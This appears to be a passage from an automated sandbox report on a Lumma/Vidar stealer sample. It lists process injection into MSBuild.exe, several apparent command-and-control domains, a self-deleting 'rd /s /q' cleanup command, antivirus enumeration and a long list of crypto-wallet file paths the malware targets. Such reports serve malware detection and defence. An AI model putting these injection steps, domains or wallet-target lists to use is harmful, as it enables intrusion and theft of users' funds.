Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C48CB0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00C48CB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C4ED09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C4ED09
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C48FBB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C48FBB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041D1A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0041D1A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041DB1C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0041DB1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004277BE SetUnhandledExceptionFilter,	2_2_004277BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA0B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6CA0B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA0B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6CA0B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CC2AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6CC2AC62
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000D8CB0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_000D8CB0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000DED09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_000DED09
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000D8FBB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_000D8FBB
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000D9148 SetUnhandledExceptionFilter,	11_2_000D9148

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe PID: 4712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4788, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\ProgramData\AKEGIIJDGH.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_0040F51F _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

2_2_0040F51F

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\ProgramData\AKEGIIJDGH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior

LummaC encrypted strings found

Source: AKEGIIJDGH.exe	String found in binary or memory: drawwyobstacw.sbs
Source: AKEGIIJDGH.exe	String found in binary or memory: condifendteu.sbs
Source: AKEGIIJDGH.exe	String found in binary or memory: ehticsprocw.sbs
Source: AKEGIIJDGH.exe	String found in binary or memory: vennurviot.sbs
Source: AKEGIIJDGH.exe	String found in binary or memory: resinedyw.sbs
Source: AKEGIIJDGH.exe	String found in binary or memory: enlargkiw.sbs
Source: AKEGIIJDGH.exe	String found in binary or memory: allocatinow.sbs
Source: AKEGIIJDGH.exe	String found in binary or memory: mathcucom.sbs

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041247D __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		2_2_0041247D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00412554 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		2_2_00412554

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1096008	Jump to behavior
Source: C:\ProgramData\AKEGIIJDGH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\ProgramData\AKEGIIJDGH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\ProgramData\AKEGIIJDGH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 448000	Jump to behavior
Source: C:\ProgramData\AKEGIIJDGH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000	Jump to behavior
Source: C:\ProgramData\AKEGIIJDGH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45C000	Jump to behavior
Source: C:\ProgramData\AKEGIIJDGH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: C8D008	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\AKEGIIJDGH.exe "C:\ProgramData\AKEGIIJDGH.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKFIJJEGHDAE" & exit	Jump to behavior
Source: C:\ProgramData\AKEGIIJDGH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\ProgramData\AKEGIIJDGH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Code function: 0_2_00C7008E cpuid

0_2_00C7008E

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,	0_2_00C94463
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00C965F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00C5E59D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: EnumSystemLocalesW,	0_2_00C5E88A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: EnumSystemLocalesW,	0_2_00C57852
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: EnumSystemLocalesW,	0_2_00C5E83F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00C5E9B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: EnumSystemLocalesW,	0_2_00C5E925
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,	0_2_00C98AD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	0_2_00C99BC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: GetLocaleInfoW,	0_2_00C57CFC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: GetLocaleInfoW,	0_2_00C5EC03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	0_2_00C98DEE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00C5ED2C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_00C97E44
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: GetLocaleInfoW,	0_2_00C5EE32
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00C5EF01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	2_2_00410DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,	2_2_0042E834
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_0042B25C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	2_2_0042B351
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	2_2_00429BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	2_2_0042B3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	2_2_0042B453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	2_2_0042ACD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	2_2_00425573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	2_2_0042B624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	2_2_0042762C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesA,	2_2_0042B6E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	2_2_00429EFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	2_2_0042E6FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	2_2_00428F54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	2_2_0042B777
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_00427706
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	2_2_0042B710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	2_2_0042B7B3
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	11_2_000EE59D
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: EnumSystemLocalesW,	11_2_000EE83F
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: EnumSystemLocalesW,	11_2_000EE88A
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: EnumSystemLocalesW,	11_2_000EE925
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	11_2_000EE9B0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: GetLocaleInfoW,	11_2_000EEC03
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_000EED2C
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: GetLocaleInfoW,	11_2_000EEE32
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_000EEF01
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: EnumSystemLocalesW,	11_2_000E7852
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: GetLocaleInfoW,	11_2_000E7CFC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Code function: 0_2_00C48EB5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00C48EB5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00410C28 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

2_2_00410C28

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00410D03 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

2_2_00410D03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: MSBuild.exe, 00000002.00000002.2517585992.00000000014E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe.c6faf0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe.c6faf0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe PID: 4712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4788, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MSBuild.exe, 00000002.00000002.2517585992.000000000159A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
